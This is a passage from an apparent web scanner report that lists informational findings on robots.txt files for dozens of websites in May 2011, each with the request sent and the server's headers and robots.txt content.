Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9
Last-Modified: Mon, 09 Nov 2009 05:58:50 GMT
ETag: "2c7081a-2b-477e9e3379a80"
Accept-Ranges: bytes
Content-Length: 43
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /survey/
Allow: /


27.611. http://www.foreclosureconnections.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foreclosureconnections.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foreclosureconnections.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:45 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Nov 2010 10:53:32 GMT
Accept-Ranges: bytes
Content-Length: 185
Vary: Accept-Encoding
Cache-Control: max-age=172800, proxy-revalidate
Connection: close
Content-Type: text/plain

# Robots.txt file for http://www.foreclosureconnections.com

User-agent: *
Disallow: /gettags/
Disallow: /plesk-stat/
Disallow: /publisher/
Disallow: /includes/
Disallow: /linkspider/


27.612. http://www.foreclosurelistingsnationwide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foreclosurelistingsnationwide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foreclosurelistingsnationwide.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:27:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 18 Oct 2010 15:02:13 GMT
ETag: "330026-269-76138740"
Accept-Ranges: bytes
Content-Length: 617
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ccbill/
Disallow: /js/
Disallow: /picture_library/
Disallow: /plesk-stat/
Disallow: /php/
Disallow: /includes/
Disallow: /gettags/
Disallow: /apility/
Disallow: /backups/
Disa
...[SNIP]...

27.613. http://www.foreclosureradar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foreclosureradar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foreclosureradar.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:29:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sat, 16 Apr 2011 03:15:36 GMT
ETag: "ba501-651-92742600"
Accept-Ranges: bytes
Content-Length: 1617
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 02:29:22 GMT
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.614. http://www.foreverliving.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foreverliving.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foreverliving.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:27 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 mod_jk/1.2.25 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 05 Sep 2008 23:04:35 GMT
ETag: "3cb0003-50-4562e17d286c0"
Accept-Ranges: bytes
Content-Length: 80
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /marketing/changeLang
Disallow: /marketing/changeSite



27.615. http://www.foreverwed.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foreverwed.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foreverwed.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:03 GMT
Server: Apache
Last-Modified: Sat, 31 Mar 2007 14:51:51 GMT
ETag: "1e-20d32fc0"
Accept-Ranges: bytes
Content-Length: 30
Connection: close
Content-Type: text/plain

User-agent: Xombot
Disallow: /

27.616. http://www.forum-auto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forum-auto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.forum-auto.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:54:09 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 07:10:35 GMT
Accept-Ranges: bytes
Content-Length: 685
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 02:54:09 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /bateau/
Disallow: /marques/porsche/sujet1954.htm
Disallow: /automobile-pratique/section1/sujet234292-175.htm
Disallow: /automobile-pratique/section15/sujet392247.htm
Disa
...[SNIP]...

27.617. http://www.forumotion.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forumotion.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.forumotion.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:51:47 GMT
Content-Type: text/plain
Content-Length: 3088
Last-Modified: Fri, 18 Jun 2010 13:40:51 GMT
Connection: close
Vary: Accept-Encoding
Expires: Thu, 03 May 2012 00:51:47 GMT
Cache-Control: max-age=31536000
Accept-Ranges: bytes

User-agent: Mediapartners-Google
Disallow:

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow:

Disallow: /personal_ads/

User-agent: Alexibot
User-agent: asterias
User-agent: BackDo
...[SNIP]...

27.618. http://www.fox10tv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox10tv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fox10tv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.13 (Unix)
Last-Modified: Wed, 04 May 2011 00:04:08 GMT
ETag: "721b5d-ab-4a267fedbee00"
Cteonnt-Length: 171
Content-Type: text/plain
Cache-Control: private, max-age=166
Date: Wed, 04 May 2011 02:11:01 GMT
Content-Length: 171
Connection: close

User-agent: *
Sitemap: http://www.fox10tv.com/sitemap_fox10tv.xml
Sitemap: http://www.fox10tv.com/feedServlet?obfType=GOOGLE_NEWS_SITEMAPS&siteId=1031
Disallow: /search

27.619. http://www.fox19.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox19.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fox19.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS39
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:9bf"
Cteonnt-Length: 818
Expires: Wed, 04 May 2011 00:51:23 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 00:51:23 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.620. http://www.foxnews.gr/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxnews.gr
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foxnews.gr

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:17:02 GMT
Server: Apache
Last-Modified: Tue, 26 Apr 2011 16:45:40 GMT
ETag: "4a1d50de41500"
Accept-Ranges: bytes
Content-Length: 699
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-admin
Disallow: /wp-includes
Disallow: /wp-content/plugins
Disallow: /wp-content/cache
Disallow: /wp-content/themes
Disallow: /trackback
Disallow
...[SNIP]...

27.621. http://www.foxtoledo.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxtoledo.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foxtoledo.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.13 (Unix)
Last-Modified: Wed, 04 May 2011 00:04:08 GMT
ETag: "721b6b-b1-4a267fedbee00"
Cteonnt-Length: 177
Content-Type: text/plain
Cache-Control: private, max-age=180
Date: Wed, 04 May 2011 02:47:32 GMT
Content-Length: 177
Connection: close

User-agent: *
Sitemap: http://www.foxtoledo.com/sitemap_foxtoledo.xml
Sitemap: http://www.foxtoledo.com/feedServlet?obfType=GOOGLE_NEWS_SITEMAPS&siteId=1032
Disallow: /search

27.622. http://www.foxyform.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxyform.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foxyform.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:28:18 GMT
Server: Apache/2.2.16
Last-Modified: Mon, 04 Oct 2010 14:00:59 GMT
ETag: "22287ce-a2-491caf94f7cc0"
Accept-Ranges: bytes
Content-Length: 162
Connection: close
Content-Type: text/plain

# robots.txt fuer http://www.foxyform.com

User-agent: *
Disallow: /contact.php
Disallow: /form.php?id=

# Google Media
User-Agent: MediaPartners-Google
Disallow:

27.623. http://www.fplayer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fplayer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fplayer.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:46:16 GMT
Server: Apache
Last-Modified: Tue, 21 Sep 2010 07:04:45 GMT
ETag: "3105a-88-490bfa4d05eba"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

27.624. http://www.franchiseclique.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.franchiseclique.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.franchiseclique.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 05:01:12 GMT
Server: Apache/2.2.9 (Fedora)
Last-Modified: Sun, 20 Feb 2011 15:15:33 GMT
ETag: "4bc706-18-49cb837ec6f40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /


27.625. http://www.fraudwatchers.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fraudwatchers.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fraudwatchers.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:33:51 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Sun, 13 Feb 2011 08:04:40 GMT
ETag: "11b7ac0-948-49c2562135600"
Accept-Ranges: bytes
Content-Length: 2376
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Crawl-delay: 10
Disallow: /__emaildb/
Disallow: /_library/
Disallow: /_tools/
Disallow: /_vti_bin/
Disallow: /files/
Disallow: /MSOffice/
Disallow: /suspended.page/
Disallow: _i
...[SNIP]...

27.626. http://www.free-css.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.free-css.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.free-css.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:52 GMT
Server: Apache
Last-Modified: Fri, 10 Dec 2010 08:12:59 GMT
ETag: "282d52e5-1a2-4d01e10b"
Accept-Ranges: bytes
Content-Length: 418
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /assets/files/free-css-layouts/download/
Disallow: /assets/files/free-css-menus/download/
Disallow: /assets/files/free-css-templates/download/
Disallow: /assets/files/free-
...[SNIP]...

27.627. http://www.free-makeup-samples.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.free-makeup-samples.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.free-makeup-samples.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:16:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 31 Aug 2007 12:47:30 GMT
ETag: "10c408f-28-438fe39d5bc80"
Accept-Ranges: bytes
Content-Length: 40
Connection: close
Content-Type: text/plain

# robots.txt

User-agent: *
Disallow:



27.628. http://www.free-makeup-tips.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.free-makeup-tips.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.free-makeup-tips.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:23:20 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Fri, 26 Feb 2010 10:36:36 GMT
ETag: "505829f-a3-4807e794a7500"
Accept-Ranges: bytes
Content-Length: 163
Connection: close
Content-Type: text/plain


User-agent: *
Disallow: /directory/
Disallow: /menu/
Disallow: /blog/wp-admin/
Disallow: /blog/wp-content/
Disallow: /blog/wp-images/
Disallow: /blog/wp-includes/

27.629. http://www.free-power-point-templates.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.free-power-point-templates.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.free-power-point-templates.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:47 GMT
Server: Apache
Last-Modified: Sun, 21 Nov 2010 21:39:12 GMT
Accept-Ranges: bytes
Content-Length: 1826
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
#Crawl-Delay: 10

# BEGIN XML-SITEMAP-PLUGIN
Sitemap: http://www.free-power-point-templates.com/sitemap.xml.gz
# END XML-SITEMAP-PLUGIN

Disallow: /wp-admin/
Disallow: /wp-conte
...[SNIP]...

27.630. http://www.free-service-manuals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.free-service-manuals.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.free-service-manuals.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:43:12 GMT
Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 22 Nov 2010 18:11:41 GMT
ETag: "68a7a3-82-495a8301b9140"
Accept-Ranges: bytes
Content-Length: 130
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /members/
Disallow: /mm2/
Disallow: /help/
Disallow: /upload/
Disallow: /css/
Disallow: /amember/
Allow: /

27.631. http://www.freebies4mom.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebies4mom.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freebies4mom.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:47:57 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Thu, 07 Apr 2011 02:41:11 GMT
ETag: "23e839b-31c-4a04b0acc5fc0"
Accept-Ranges: bytes
Content-Length: 796
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin
Disallow: /wp-
Disallow: /search
Disallow: /category
Disallow: /tag
Disallow: /author
Disallow: /trackback
Disallow: /*trackback
Disallow: /*trackback*
Disallow: /*/tr
...[SNIP]...

27.632. http://www.freebiezz.info/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freebiezz.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freebiezz.info

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:09:28 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://freebiezz.info/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.633. http://www.freedomlist.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freedomlist.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freedomlist.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:56:51 GMT
Server: Apache/1.3.42 (Unix) PHP/4.4.9 mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Wed, 16 Jun 2004 07:25:58 GMT
ETag: "be0012-c2d-40cff606"
Accept-Ranges: bytes
Content-Length: 3117
Connection: close
Content-Type: text/plain

User-agent: Googlebot-Image

User-agent: Black Hole

User-agent: Titan

User-agent: WebStripper

User-agent: NetMechanic

User-agent: CherryPicker

User-agent: EmailCollector

User-agent: EmailSiphon

...[SNIP]...

27.634. http://www.freefutanaria.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freefutanaria.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freefutanaria.net

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:54:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.11
X-Pingback: http://freefutanaria.net/xmlrpc.php
Vary: Accept-Encoding,User-Agent
Content-Length: 74
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://freefutanaria.net/sitemap.xml.gz

27.635. http://www.freelang.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freelang.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freelang.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:43:36 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 09 Nov 2009 03:07:07 GMT
ETag: "f4840ac-673-477e77d1c4cc0"
Accept-Ranges: bytes
Content-Length: 1651
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /blog/wp-admin/
Disallow: /blog/wp-content/
Disallow: /blog/wp-includes/
Disallow: /blog/wp-*.php
Disallow: /blog/index.html
Disallo
...[SNIP]...

27.636. http://www.freelaptopsites.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freelaptopsites.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freelaptopsites.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:15:47 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.6.3 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.30
X-Powered-By: PHP/5.2.17
p3p: CP="PSA"
X-Pingback: http://freelaptopsites.org/xmlrpc.php
Set-Cookie: popover_view_a2bd017e7dc7f54d187d72fb281f3736=1; expires=Sun, 15-Apr-2012 09:35:47 GMT; path=/
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://freelaptopsites.org/sitemap.xml.gz

27.637. http://www.freemagictricks4u.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemagictricks4u.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freemagictricks4u.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:00:56 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.freemagictricks4u.com/VJdfsuWY.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /dy
...[SNIP]...

27.638. http://www.freemasonrywatch.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemasonrywatch.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freemasonrywatch.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:26:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Sun, 17 Apr 2011 06:32:20 GMT
ETag: "55cf44-1ac-4a1176fde4500"
Accept-Ranges: bytes
Content-Length: 428
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:


User-agent: *
Sitemap: http://www.freemasonrywatch.org/sitemap.xml
Sitemap: http://www.freemasonrywatch.org/sitemap.xml.gz
Sitemap: http://www.freemasonr
...[SNIP]...

27.639. http://www.freemesa.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemesa.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freemesa.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:12:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 05 Nov 2009 22:57:39 GMT
ETag: "3321030-17-477a7a76c9ec0"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

27.640. http://www.freemoney.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freemoney.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freemoney.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:45:56 GMT
Server: Apache
Last-Modified: Tue, 15 Dec 2009 17:12:45 GMT
ETag: "3887c-23-47ac77f9e3d40"
Accept-Ranges: bytes
Content-Length: 35
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: ia_archiver Disallow: /

27.641. http://www.freenew.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freenew.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freenew.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:23:44 GMT
Server: Apache
Last-Modified: Fri, 04 Jun 2010 04:01:24 GMT
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.642. http://www.freeonlinejobsathome.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeonlinejobsathome.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeonlinejobsathome.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:13:15 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:4"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

27.643. http://www.freeroms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeroms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeroms.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:13 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.5 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
Last-Modified: Sat, 06 Feb 2010 09:35:41 GMT
ETag: "57d0a-18-47eeb4a9c1540"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /


27.644. http://www.freestuff4free.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freestuff4free.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freestuff4free.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:43:22 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
ETag: "0ac3393c4cb1:7"
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

27.645. http://www.freevistafiles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freevistafiles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freevistafiles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:43:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 28 Jun 2007 10:17:14 GMT
ETag: "1840007-19-433f4aa987e80"
Accept-Ranges: bytes
Content-Length: 25
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 04:43:46 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

27.646. http://www.freewarepocketpc.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freewarepocketpc.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freewarepocketpc.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:11:04 GMT
Server: Apache
Last-Modified: Sun, 10 Feb 2008 22:42:42 GMT
ETag: "8aaed-17-8a91bc80"
Accept-Ranges: bytes
Content-Length: 23
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.647. http://www.freewarestore.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freewarestore.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freewarestore.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:38 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 14 Feb 2011 12:03:48 GMT
Accept-Ranges: bytes
Content-Length: 109
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

# /robots.txt for http://www.freewarestore.net
# comments to admin@sex.com

User-agent: *
Allow: *
Disallow:

27.648. http://www.freeweddingtoasts.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeweddingtoasts.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeweddingtoasts.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:16:10 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_fcgid/2.3.5 Phusion_Passenger/2.2.15 FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1
Last-Modified: Fri, 15 May 2009 23:34:48 GMT
ETag: "3a080b2-a6-469fbe3e53600"
Accept-Ranges: bytes
Content-Length: 166
Connection: close
Content-Type: text/plain

User-agent: *
